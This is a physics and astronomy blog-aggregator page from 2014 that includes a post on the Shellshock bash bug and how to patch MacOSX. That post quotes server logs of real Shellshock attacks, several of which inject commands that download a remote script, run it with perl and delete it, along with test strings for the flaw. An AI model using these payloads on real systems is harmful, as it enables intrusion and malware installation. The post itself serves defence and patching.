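The combination gain itself is just standard error propagation: independent measurements are averaged with inverse-variance weights, and the combined uncertainty shrinks below that of the best single input. A sketch with hypothetical inputs (not the actual CMS or DZERO numbers):

```python
# Inverse-variance-weighted combination of independent measurements.
# Input values and errors below are hypothetical, for illustration only.

def combine(values, errors):
    """Weighted average and its uncertainty for independent measurements."""
    weights = [1.0 / e**2 for e in errors]
    mean = sum(w * v for w, v in zip(weights, values)) / sum(weights)
    err = (1.0 / sum(weights)) ** 0.5
    return mean, err

# Two top-mass-like inputs (GeV) with different precision:
m, e = combine([172.6, 172.2], [0.6, 0.8])
print(f"combined: {m:.2f} +/- {e:.2f} GeV  ({100 * e / m:.2f}%)")
```

Note the combined error (0.48 GeV here) is smaller than either input error, which is the whole point of such combinations.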

read more

by Tommaso Dorigo at September 30, 2014 10:47 AM

Emily Lakdawalla - The Planetary Society Blog

Planetary Society President Testifies Before Congress
Society President Dr. Jim Bell provided expert testimony at a September hearing on the state (and fate) of planetary science.

September 30, 2014 04:38 AM

Jaques Distler - Musings

Shellshock and MacOSX

Most Linux Distros have released patches for the recently-discovered “Shellshock” bug in /bin/bash. Apple has not, despite the fact that it uses bash as the default system shell (/bin/sh).

If you are running a webserver, you are vulnerable. Even if you avoid the obvious pitfall of writing CGI scripts as shellscripts, you are still vulnerable if one of your Perl (or PHP) scripts calls out to system(). Even Phusion Passenger is vulnerable. And, yes, this vulnerability is being actively exploited on the Web. - - [24/Sep/2014:20:35:04 -0500] "GET / HTTP/1.0" 301 402 "() { :; }; ping -c 11" "shellshock-scan (" "-" - - - - - [25/Sep/2014:02:50:59 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 411 "-" "() { :;}; /bin/ping -c 1" "-" - - - - - [25/Sep/2014:18:55:31 -0500] "GET / HTTP/1.1" 301 379 "() { :; }; /bin/ping -c 1" "() { :; }; /bin/ping -c 1" "-" - - - - - [25/Sep/2014:20:05:01 -0500] "GET / HTTP/1.1" 301 379 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php5 HTTP/1.0" 301 391 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php HTTP/1.0" 301 390 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 301 395 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/ HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/ HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /test HTTP/1.0" 301 383 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:40 -0500] "GET /cgi-bin/ HTTP/1.0" 301 394 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf 
/var/tmp/wow1\"" "-" -  - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php HTTP/1.0" 404 359 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php5 HTTP/1.0" 404 360 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/php.fcgi HTTP/1.0" 404 364 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - [26/Sep/2014:03:29:41 -0500] "GET /test HTTP/1.0" 404 352 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/ HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/ HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - [26/Sep/2014:03:29:41 -0500] "GET /cgi-bin/ HTTP/1.0" 404 363 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\"" "-" - - - - - [26/Sep/2014:14:39:29 -0500] "GET / HTTP/1.1" 301 385 "-" "() { :;}; /bin/bash -c \"wget --delete-after\"" "-" - - - - - [26/Sep/2014:14:39:30 -0500] "GET / HTTP/1.1" 200 155 "-" "() { :;}; /bin/bash -c \"wget --delete-after\"" "-" - - - - - [26/Sep/2014:15:09:21 -0500] "GET /category/2007/07/making_adscft_precise.html%0A HTTP/1.1" 301 431 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:09:23 -0500] "GET /category/2007/07/making_adscft_precise.html%0D%0A HTTP/1.1" 301 434 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:09:24 -0500] "GET /category/2007/07/making_adscft_precise.html%0d%0a HTTP/1.1" 404 393 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:09:33 -0500] "GET 
/category/2007/07/making_adscft_precise.html%0a HTTP/1.1" 404 392 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:11:41 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0A HTTP/1.1" 301 439 "-" "() { :;}; echo -e 'detector'" "-" - - - - - [26/Sep/2014:15:11:44 -0500] "GET /category/2008/02/bruce_bartlett_on_the_charged.html%0a HTTP/1.1" 404 400 "-" "() { :;}; echo -e 'detector'" "-" - - -

Some of these look like harmless probes; others (like the one which tries to download and run an IRCbot on your machine) less so.

If you’re not running a webserver, the danger is less clear. There are persistent (but apparently incorrect) rumours that Apple’s DHCP client may be vulnerable. If true, then your iPhone could easily be pwned by a rogue DHCP server (running on someone’s laptop) at Starbucks.

I don’t know what to do about your iPhone, but at least you can patch your MacOSX machine yourself.

The following instructions (adapted from this blog post) are for MacOSX 10.9 (Mavericks). The idea is to download Apple’s source code for bash, patch it using the official bash patches, and recompile. If you are running an earlier version of MacOSX, you’ll have to download the appropriate package from Apple and use the corresponding patches for bash. Of course, you’ll need XCode, which is free from the App Store.

Fire up Terminal and do

mkdir bash
cd bash/
curl -O
tar xzf bash-92.tar.gz
cd bash-92/bash-3.2/
curl | patch -p0
curl | patch -p0
curl | patch -p0
cd ..
xcodebuild
sudo cp /bin/bash /bin/bash.vulnerable
sudo cp /bin/sh /bin/sh.vulnerable
sudo chmod 0000 /bin/*.vulnerable
sudo cp build/Release/bash build/Release/sh /bin/

Now you can try (in a new shell)

bash --version

which should yield

GNU bash, version 3.2.54(1)-release (x86_64-apple-darwin13)
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

should yield

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test


env X='() { (a)=>\' sh -c "echo date"; cat echo

should yield

sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
cat: echo: No such file or directory

Approach these instructions with some caution.

  • You absolutely need a working version of /bin/sh for your system to function.
  • If you have a bunch of machines to update (as I did), you may be better off copying the new versions of bash and sh onto a thumb drive and using that to update your other machines.

Update (9/28/2014):

Apple has issued a statement to the effect that ordinary client systems are not remote-exploitable. At least as far as DHCP goes, that seems to be the case. The DHCP client functionality is implemented by the IPConfiguration agent, run by configd; no shellscripts are involved (unlike, say, under Linux). There are other subsystems to worry about (CUPS, SNMP, …), even on “client” systems. But I think I’ll give Apple the benefit of the doubt on that score.

Update (9/29/2014):

Apple has finally issued Bash patches for Mavericks, Mountain Lion and Lion. Oddly, these only bring Bash up to 3.2.53, rather than 3.2.54 (which is the latest, and hopefully final, iteration defanging the Shellshock attack).

by distler at September 30, 2014 04:34 AM

Emily Lakdawalla - The Planetary Society Blog

Brief mission update: Hayabusa 2 has a launch date!
JAXA announced the launch date for their Hayabusa 2 asteroid sample return mission today: November 30 at 13:24:48 Japan standard time (04:24:48 UT / November 29 at 20:24:48 PST)

September 30, 2014 04:28 AM

September 29, 2014

Christian P. Robert - xi'an's og

The Unimaginable Mathematics of Borges’ Library of Babel [book review]

This is a book I carried away from JSM in Boston, as the Oxford University Press representative kindly provided me with a copy at the end of the meeting after I asked for it: I was quite excited to see a book linking Jorge Luis Borges’ great Library of Babel short story with mathematical concepts. Even though many other short stories by Borges have a mathematical flavour and are bound to fascinate mathematicians, the Library of Babel is particularly prone to mathematisation as it deals with the notions of the infinite, periodicity, permutation, randomness… As it happens, William Goldbloom Bloch [a patronym that would surely have inspired Borges!], professor of mathematics at Wheaton College, Mass., published the unimaginable mathematics of Borges’ Library of Babel in 2008, so this is not a recent publication, but I had managed to miss it at the several conferences where I stopped at the OUP exhibit booth. (Interestingly, William Bloch has also published a mathematical paper on Neal Stephenson’s Cryptonomicon.)

Now, what is unimaginable in the maths behind Borges’ great Library of Babel??? The obvious line of entry to the mathematical aspects of the book is combinatorics: how many different books are there in total? [Ans. 10¹⁸³⁴⁰⁹⁷...] how many hexagons are needed to shelve that many books? [Ans. 10⁶⁸¹⁵³¹...] how long would it take to visit all those hexagons? how many librarians are needed for a Library containing all volumes once and only once? how many different libraries are there? [Ans. 10^(10⁶)...] Then the book embarks upon some cohomology, Cavalieri’s infinitesimals (mentioned by Borges in a footnote), Zeno’s paradox, topology (with Klein’s bottle), graph theory (and the important question as to whether each hexagon has one or two stairs), information theory, and Turing’s machine. The concluding chapters offer comments on other mathematical analyses of Borges’ Grand Œuvre and a discussion of how much maths Borges knew.
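The headline combinatorial number is easy to reproduce: with Borges' alphabet of 25 symbols and 410 pages of 40 lines of 80 characters per book, there are 25^1,312,000 distinct books. A quick check of the exponent:

```python
import math

symbols = 25                     # Borges' 22 letters, space, comma, period
chars_per_book = 410 * 40 * 80   # pages x lines x characters = 1,312,000

# log10 of the number of distinct books, 25**chars_per_book
exponent = chars_per_book * math.log10(symbols)
print(f"number of books ~ 10^{exponent:.0f}")
```

The result, about 10^1834097, matches the figure quoted above.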

So, a nice escapade through some mathematical landscapes with more or less connection to the original masterpiece. I am not convinced it brings any further dimension or insight about it, or even that one should try to dissect it that way, because doing so kills the poetry in the story, especially the play around the notion(s) of infinite. The fact that the short story is incomplete [and short on details] makes its beauty: if one starts wondering about the possibility of the Library or about the daily life of the librarians [like, what do they eat? why are they there? where are the readers? what happens when they die? &tc.] the intrusion of realism closes the enchantment! Nonetheless, the unimaginable mathematics of Borges’ Library of Babel provides a pleasant entry into some mathematical concepts and as such may initiate a layperson not too shy of maths formulas into the beauty of mathematics.

Filed under: Books, Statistics, Travel, University life Tagged: book review, Boston, cohomology, combinatorics, infinity, information theory, Jorge Luis Borges, JSM 2014, Library of Babel, Oxford University Press, Turing's machine

by xi'an at September 29, 2014 10:14 PM

astrobites - astro-ph reader's digest

Shutting off Star Formation in Galaxies

Title: The Mass Dependence of Dwarf Satellite Galaxy Quenching

Authors: Colin T. Slater, Eric F. Bell

First Author’s Institution: Dept. of Astronomy, University of Michigan, Ann Arbor, MI

Paper Status: Accepted to The Astrophysical Journal Letters

Galaxies can’t form stars forever! At some point in its evolution, a galaxy will consume all of its star forming fuel (cold, dense gas). Exactly when this occurs, however, isn’t a simple question of taking the amount of gas present and dividing by the star formation rate. There are a host of processes that can stop gas from cooling and condensing (as is necessary for star formation), thereby “quenching” star formation in a galaxy. One such process, called ram-pressure stripping, occurs as galaxies fall into galaxy clusters (or as dwarf galaxies orbit larger galaxies), and removes gas that would otherwise have cooled and fueled star formation. Another process is supernovae, which can heat up and eject gas. Galaxy-galaxy interactions like mergers can have a similar effect. This occurs most frequently in galaxy groups and galaxy clusters, where galaxies are relatively close together.

Although we have a good understanding of what processes can stop star formation, there still remain many unanswered questions, including how they work in a given galaxy, when they occur, which processes are dominant, and how all this may vary for different galaxies. The authors investigate these problems by examining how the fraction of quenched galaxies (those with star formation shut off) varies with galaxy mass for all galaxies within 3 Mpc of us. They also examine the role of galaxy environment, differentiating between satellite galaxies (such as those around our Milky Way), and those that are isolated (usually referred to as “field galaxies”). Armed with this information, they construct models to constrain some key parameters of the star formation quenching process.

Picking out Galaxies

The authors use a selection of galaxies from SDSS and the NASA-Sloan Atlas of galaxies (NSA). A galaxy here is classified as star forming if it contains young, hot stars and cold gas; this is not a perfect metric for all galaxies, however, and the authors take this uncertainty into account. The largest source of uncertainty lies in determining whether a given galaxy is a satellite galaxy or an isolated galaxy. Galaxies are considered satellites if they lie within a specified redshift interval of another, more massive galaxy, the redshift being identified from the Doppler shifting of light from the observed galaxy. However, this is subject to projection effects: the sometimes large peculiar velocities of galaxies can shift their measured redshifts enough to make them appear as satellites of another galaxy, contaminating the sample. The authors determine the likelihood of this occurring by conducting mock observations of a cosmological N-body simulation (the Millennium simulation), where the actual galaxy positions are known, and comparing the observed satellite count to the actual satellite count.
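The projection effect can be illustrated with a toy Monte Carlo (all numbers below are illustrative, and this is not the authors' Millennium-based procedure): galaxies many megaparsecs behind a host can scatter into its velocity window through their peculiar velocities.

```python
import random

random.seed(1)
H0 = 70.0          # km/s/Mpc, Hubble constant
sigma_pec = 300.0  # km/s, peculiar-velocity scatter (illustrative)
v_cut = 250.0      # km/s, velocity window used to tag satellites
n = 100_000

# Background galaxies 1-20 Mpc behind the host: physically NOT satellites.
interlopers = 0
for _ in range(n):
    d = random.uniform(1.0, 20.0)              # Mpc behind the host
    v = H0 * d + random.gauss(0.0, sigma_pec)  # apparent velocity offset
    if abs(v) < v_cut:
        interlopers += 1

print(f"{100 * interlopers / n:.1f}% of these distant galaxies "
      "masquerade as satellites")
```

Even with these crude assumptions, a non-negligible fraction of physically unrelated galaxies passes the velocity cut, which is why the mock-observation calibration matters.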

Fig. 1

Fig. 1: The fraction of quenched galaxies at a given galactic stellar mass (total mass of stars in the galaxy). The solid lines show, for a host galaxy of a given stellar mass, the fraction of its satellites that are quenched. The dashed lines show the fraction of isolated galaxies at a given mass that are quenched. The black lines denote SDSS galaxies, while green lines denote galaxies taken from the NSA sample. Due to the low values and large errors in the dashed lines, the authors consider these points consistent with zero. (Source: Fig. 1 of Slater and Bell 2014)


Their final results are shown in Fig. 1. For a host galaxy of a given mass, the fraction of its quenched satellites is shown with solid lines, while the quenched fraction of isolated galaxies at a given mass is shown with dashed lines. Galaxies from the NSA sample are shown in green, SDSS in black. The results show that a substantial fraction of all satellite galaxies are quenched, nearly all of them at low stellar masses. Towards higher stellar masses there is a clear decrease in the quenched fraction until about 10⁹ solar masses, where the quenched fraction begins to increase again. Due to the low quenched fraction of the field galaxies (dashed) and the large errors, the authors consider the quenched fraction of field galaxies to be consistent with zero.

Improving Our Understanding of Quenching

The authors use their results to better understand how long after a satellite galaxy reaches its point of closest approach (called pericenter) to the host galaxy star formation ceases. The model is somewhat akin to saying that once a satellite passes pericenter, a fixed clock starts counting down to the end of its star formation. The authors test this by examining satellite galaxies in the cosmological N-body simulation Via Lactea II. Looking at z = 0 in the simulation, they examine the distribution of times since pericenter passage for all satellite galaxies and show that, in order to reproduce the observed quenched fractions, star formation quenching must occur quickly for low-mass galaxies, within 2 Gyr of pericenter passage. The clock is different for the higher-mass galaxies (green in Fig. 1), roughly 6-9 Gyr. This suggests that satellites of different masses respond differently to whatever effects ultimately end their star formation.
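The "quenching clock" logic is simple to sketch: given a distribution of times since pericenter passage, the quenched fraction is just the fraction of satellites whose clock has run past the quenching delay. A toy version with a made-up (uniform) time distribution rather than the actual Via Lactea II one:

```python
import random

random.seed(42)

# Toy distribution of times since first pericenter passage (Gyr);
# the paper draws these from the Via Lactea II simulation instead.
times = [random.uniform(0.0, 10.0) for _ in range(100_000)]

def quenched_fraction(times, delay):
    """Fraction of satellites quenched if star formation stops
    'delay' Gyr after pericenter passage."""
    return sum(t > delay for t in times) / len(times)

for delay in (2.0, 6.0, 9.0):
    print(f"delay = {delay:.0f} Gyr  ->  quenched fraction = "
          f"{quenched_fraction(times, delay):.2f}")
```

A short delay quenches most of the population while a long delay quenches few, which is how the observed quenched fractions constrain the delay for each mass bin.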

The authors conduct a similar analysis using the maximum ram-pressure stripping force (which is related to the density of stars and dark matter in a galaxy, and to the galaxy’s velocity) experienced by each satellite galaxy. They argue that, if ram-pressure stripping is the dominant source of quenching, at least 50% of galaxies must experience forces of 10^-12.8 dyne cm^-2 or greater, and 90% must experience forces of 10^-14.8 dyne cm^-2 or greater. In addition, satellite galaxies, regardless of mass, appear to experience very similar ram-pressure forces. Because of this, the authors argue that there must be a dramatic difference in how galaxies of different masses respond to ram-pressure stripping.
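The quoted force scale can be put in context with the textbook ram-pressure estimate P = ρv², which uses the ambient gas density and the satellite's velocity; the density and velocity below are illustrative, not values from the paper.

```python
import math

m_p = 1.673e-24        # g, proton mass

def ram_pressure(n_gas, v_kms):
    """Ram pressure rho * v^2 in dyne/cm^2 for a hot halo of number
    density n_gas (cm^-3) traversed at velocity v_kms (km/s)."""
    rho = n_gas * m_p          # g/cm^3
    v = v_kms * 1.0e5          # cm/s
    return rho * v * v

# Illustrative satellite moving through a tenuous hot halo:
P = ram_pressure(n_gas=1.0e-4, v_kms=200.0)
print(f"P_ram ~ 10^{math.log10(P):.1f} dyne cm^-2")
```

This crude estimate lands around 10^-13 dyne cm^-2, i.e. within the 10^-14.8 to 10^-12.8 range discussed above.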

Improving our understanding of the galaxy quenching process requires work on multiple fronts. Here, the authors use observations to better understand quenching in our Universe, and construct models based upon those observations to constrain the various mechanisms posited for quenching. In future work, these observations and models can be used to constrain detailed computer simulations that attempt to directly reproduce the observed distribution. In the end, these all work together to advance our understanding of how galaxies evolve.

by Andrew Emerick at September 29, 2014 08:13 PM

Clifford V. Johnson - Asymptotia

Save “Krulwich Wonders”!
As readers of this blog who appreciate the idea of putting science into the daily routine for a balanced diet, of mixing in sketches here and there, of good humour and a wondering eye on the world.... you'll agree with me that we need to raise our voices and call out to NPR to Save "Krulwich Wonders". According to Robert Krulwich, they are planning to cancel his blog as part of cost-cutting... this would be a big blow for the (always in danger) mission to improve the public understanding of science. Many suggestions are in the comments to the post I linked above, so feel free to read them and follow the ones that make sense to you! [Update: I've put a hashtag #savewonderNPR into the accompanying tweet of this post, so feel free to use that in your own awareness-raising efforts on this...] Act fast to let your voice be heard. The axe is on its way down!* -cvj *I learned this from the blog Nanoscale Views. Click to continue reading this post

by Clifford at September 29, 2014 05:35 PM

ZapperZ - Physics and Physicists

Test of Time Dilation Using Relativistic Li Ion Clocks
This may be a week old, but it is still important in validating SR.

A new result on the measurement of the effect of relativistic time dilation in stored Li ions has come up trumps for Special Relativity.

To carry out such a test, Benjamin Botermann of Johannes Gutenberg-University, Germany, and his colleagues looked for the relativistic Doppler shift in lithium ions accelerated to a third of the speed of light at the Experimental Storage Ring in Darmstadt, Germany. The team stimulated two separate transitions in the ions using two lasers propagating in opposite directions with respect to the ion motion. The experiment effectively measures the shift in the laser frequencies relative to what these transition frequencies are for ions at rest. The combination of two frequency shifts eliminates uncertain parameters and allows the team to validate the time dilation prediction to a few parts per billion, improving on previous limits. The result complements other Lorentz violation tests that use higher precision atomic clocks but much slower relative velocities.
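The two-laser trick works because of an exact relativistic identity: the product of the blueshifted (anti-parallel) and redshifted (parallel) resonant laboratory frequencies equals the square of the rest-frame transition frequency, independent of the ion velocity, so any deviation would signal a failure of time dilation. A sketch with an illustrative transition frequency:

```python
import math

def lab_frequencies(nu0, beta):
    """Lab-frame laser frequencies resonant with a transition of
    rest-frame frequency nu0 for an ion moving at v = beta * c,
    for anti-parallel and parallel laser propagation."""
    gamma = 1.0 / math.sqrt(1.0 - beta**2)
    nu_anti = nu0 * gamma * (1.0 + beta)   # blueshifted
    nu_para = nu0 * gamma * (1.0 - beta)   # redshifted
    return nu_anti, nu_para

nu0 = 5.0e14        # Hz, illustrative transition frequency
beta = 1.0 / 3.0    # a third of the speed of light

nu_a, nu_p = lab_frequencies(nu0, beta)

# Time dilation prediction: the product is velocity-independent.
print(f"nu_a * nu_p / nu0^2 = {nu_a * nu_p / nu0**2:.12f}")
```

The ratio is exactly 1 because gamma^2 * (1 + beta) * (1 - beta) = 1; measuring both frequencies therefore tests the gamma factor without needing to know the ion velocity precisely.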

The more they test it, the more convincing it becomes.
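The "two lasers" trick described above has a neat numerical illustration: in special relativity the product of the blue- and red-shifted resonance frequencies equals the square of the rest-frame transition frequency, independent of the ion velocity, which is why combining the two shifts cancels uncertain parameters. A minimal sketch (the transition frequency here is illustrative, not the actual Li line):

```python
import math

def doppler_pair(nu0, beta):
    """Lab-frame frequencies of two lasers, co- and counter-propagating with
    the ion beam, that are resonant with a transition of frequency nu0 in
    the ion rest frame (relativistic Doppler effect)."""
    gamma = 1.0 / math.sqrt(1.0 - beta ** 2)
    nu_parallel = nu0 * gamma * (1.0 + beta)
    nu_antiparallel = nu0 * gamma * (1.0 - beta)
    return nu_parallel, nu_antiparallel

nu0 = 5.0e14      # Hz; an illustrative optical transition frequency
beta = 1.0 / 3.0  # ion speed as a fraction of c, as in the storage-ring test

nu_p, nu_a = doppler_pair(nu0, beta)
# SR predicts nu_p * nu_a == nu0**2 exactly, for any beta, so measuring both
# shifted frequencies tests time dilation without knowing beta precisely.
print(nu_p * nu_a / nu0 ** 2)  # → 1.0 up to floating-point rounding
```

Any deviation of that product from one would signal a departure from the special-relativistic time dilation factor.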


by ZapperZ ( at September 29, 2014 03:53 PM

Symmetrybreaking - Fermilab/SLAC

CERN turns 60

CERN celebrates six decades of peaceful collaboration for science.

Today, CERN, the European Organization for Nuclear Research, is blowing out 60 candles at an event attended by official delegations from 35 countries. Founded in 1954, CERN is the largest particle physics laboratory in the world and a prime example of international collaboration, bringing together scientists of almost 100 nationalities.

CERN’s origins can be traced back to the late 1940s. In the aftermath of the Second World War, a small group of visionary scientists and public administrators on both sides of the Atlantic identified fundamental research as a potential vehicle to rebuild the continent and to foster peace in a troubled region. It was from these ideas that CERN was born on September 29, 1954, with a dual mandate to provide excellent science and to bring nations together. This blueprint for collaboration has worked remarkably well over the years and expanded to all the continents.

“For six decades, CERN has been a place where people can work together, regardless of their culture and nationality. We form a bridge between cultures by speaking a single universal language, and that language is science,” says CERN Director General Rolf Heuer. “Indeed, science is an essential part of culture. Maestro Ashkenazy, conducting the European Union Youth Orchestra here today, puts it most eloquently in saying that while music reflects the reality of our spiritual life and tries to convey to us the essence of our existence, science’s mission is extremely similar; it also tries to explain the world to us.”

CERN came into being in 1954 when its convention, agreed by 12 founding member states, came into force. Over the years and with its continuing success, CERN has attracted new countries and become a truly global organization. Today it has 21 member states and more than 10,000 users from all over the world, and more countries have applied for membership.

“Over time, CERN has become the world’s leading laboratory in particle physics, always oriented towards, and achieving, excellence,” says CERN Council President Agnieszka Zalewska.

CERN’s business is fundamental physics, aiming to find out what the universe is made of and how it works. Since CERN's founding, the landscape of fundamental physics has dramatically changed. Then, knowledge of matter at the smallest scales was limited to the nucleus of the atom. In 60 years, particle physicists have advanced knowledge of forces and matter at the smallest scales, developed a sound theory based on this knowledge—the Standard Model—and improved the understanding of the universe and its beginnings.

Over the years, physicists working at CERN have contributed to this progress as a series of larger and ever more powerful accelerators have allowed researchers to explore new frontiers of energy. Among the many results achieved, some discoveries have dramatically improved comprehension of the fundamental laws of nature and pushed forward technologies. These include the discovery of the particle carriers of the weak force, rewarded with a Nobel Prize for Carlo Rubbia and Simon van der Meer in 1984, the invention of the world wide web by Tim Berners-Lee in 1989, the development of a revolutionary particle detector by Georges Charpak, rewarded by a Nobel Prize in 1992, and the discovery of the Higgs boson in 2012, proving the existence of the Brout-Englert-Higgs mechanism, which led to a Nobel Prize for Peter Higgs and François Englert in 2013.

Today CERN operates the world’s leading particle accelerator, the Large Hadron Collider. With the restart of the LHC next year at new record energy, CERN will continue to seek answers to some of the most fundamental questions about the universe.

CERN published a version of this article as a press release.


Like what you see? Sign up for a free subscription to symmetry!

September 29, 2014 03:15 PM

Peter Coles - In the Dark

House on a Cliff

Indoors the tang of a tiny oil lamp. Outdoors
The winking signal on the waste of sea.
Indoors the sound of the wind. Outdoors the wind.
Indoors the locked heart and the lost key.

Outdoors the chill, the void, the siren. Indoors
The strong man pained to find his red blood cools,
While the blind clock grows louder, faster. Outdoors
The silent moon, the garrulous tides she rules.

Indoors ancestral curse-cum-blessing. Outdoors
The empty bowl of heaven, the empty deep.
Indoors a purposeful man who talks at cross
Purposes, to himself, in a broken sleep.

by Louis MacNeice (1907-1963).

by telescoper at September 29, 2014 12:31 PM

Tommaso Dorigo - Scientificblogging

Donate To Sense About Science!
Sense About Science is a non-profit organization that campaigns in favour of more correct diffusion and use of scientific information. It is a great attempt at increasing the quality of the scientific information in circulation, focusing on evidence and debunking false claims. The web site of the organization explains:

read more

by Tommaso Dorigo at September 29, 2014 10:49 AM

Lubos Motl - string vacua and pheno

Influence of parity violation on biochemistry measured
Parity violation could matter in biology, after all

Up to the 1950s, people would believe that the laws of physics were invariant under the simple left-right mirror reflection. However, neutrinos were found to be left-handed and other processes linked to the weak nuclear force that violate the left-right symmetry were found in the 1950s. You know, the direction of the electron that leaves a nucleus after it beta-radiates is correlated with the nucleon's spin even though the velocity is a polar vector and the spin is an axial vector – such a correlation couldn't exist in a left-right-symmetric world.

A prejudice has been falsified. Ten years later, the CP symmetry was shown to be invalid as well although its violation in Nature is even tinier. The combined CPT symmetry has to hold and does hold (at least so far), as implied by Pauli's CPT theorem.

Bromocamphor, to become a player below

With the help of chiral spinors (and perhaps self-dual or anti-self-dual middle, (\(2k+1\))-forms i.e. antisymmetric tensors if the spacetime dimension is \(4k+2\)) particle physicists learned to build left-right-asymmetric theories and it became a mundane business. The electroweak theory included in the Standard Model is the most tangible real-world example of a left-right-asymmetric theory.

We also observe some left-right asymmetry in the world around us. Most of us have a heart on the left side – which could be an accident. But such left-right asymmetries exist at a more elementary level. Amino acids and other molecules look different than their images in the mirror – and all the life we know seems to use only one of the two images, typically a "left-handed-screwed" version of such molecules.

Is there a relationship to the violation of the parity at the fundamental level?

Neutrinos don't seem to be directly relevant for biochemistry because they're almost entirely invisible. And the effect of the parity violation on the electrons' energy levels and the probabilities of chemical reactions seems to be too tiny. So I think it's fair to say that most of the competent biochemists and biophysicists would say that it's a coincidence that the life molecules are "skewed", "screwed", "spun", and "twisted" in a particular direction. Sometime at the beginning when life began to expand, it was only the life based on one chirality and it just ate the oppositely chiral "seeds of life", if there were any, as if it were food. Incidentally, I think if you eat the mirror proteins, you won't die but you won't get energy from them, either!

However, there was also a school of thought that those asymmetries could matter, after all. One unusually well-defined version of this paradigm was the so-called Vester-Ulbricht hypothesis which claimed that the cosmic beta-radiation (a beam of electrons from space) had a helicity (an asymmetry in helicities, to say the least), and it selectively killed the now-unobserved copy of the "two mirror images of life".

Now, some experimental evidence in favor of this paradigm was published in PRL:
Chirally Sensitive Electron-Induced Molecular Breakup and the Vester-Ulbricht Hypothesis (J. M. Dreiling and T. J. Gay, Sep 12th)

Weak Nuclear Force Shown to Give Asymmetry to Biochemistry of Life (Elizabeth Gibney, Nature and SciAm, popular, Sep 25th)
They were colliding longitudinally polarized sub-eV electrons (they are spinning around the axis in the direction of motion) with molecules of \({\rm C}_{10}{\rm H}_{15}{\rm BrO}\), an organic compound called "bromocamphor" containing bromine (see the diagram at the top), with the goal of breaking the molecule apart and getting the bromine atom out of it.

This may be measured for the two mirror images of the molecule, left-handed and right-handed one, if you wish, and the probability of the breakup (dissociative bromine anion production) depends on the relative sign between the electron's helicity and the molecule's chirality. They found the ratio of the two reaction rates to be\[
\frac{N_+}{N_-} \sim 1.0006.
\] They differ by 0.06 percent. It's arguably measurable – although the guys could have fooled themselves, too – but it's still very small (although arguably larger than what you may expect the "tiny and esoteric" physics of the weak nuclear force to bring to low-energy fields such as biochemistry). I am not sure whether a difference that is this small may play a significant role in the selection of the "right" chiral edition of the organic molecules.

But there are contexts in which one may imagine that this difference gets brutally magnified. For example, imagine that a reservoir of such molecules is needed as "food reserves" at some point and these food reserves drop to a tiny percentage, say \(\exp(-10)\sim 0.0045\%\), of the original size. It's ten (decreasing) \(e\)-foldings. During the same time, if one reaction undergoes ten \(e\)-foldings, the mirror image undergoes \(10.006\) \(e\)-foldings, and because that number ends with \(0.006\), this reaction will leave a smaller amount of the food reserves by \(0.6\) percent. What I want to say is that if you allow the asymmetry to influence exponential processes for a sufficiently long time, the original \(0.06\) percent may increase to a larger relative difference, one multiplied by the number of \(e\)-foldings. The same magnification of the asymmetry may affect exponentially growing, "constructive" processes. But is that enough?

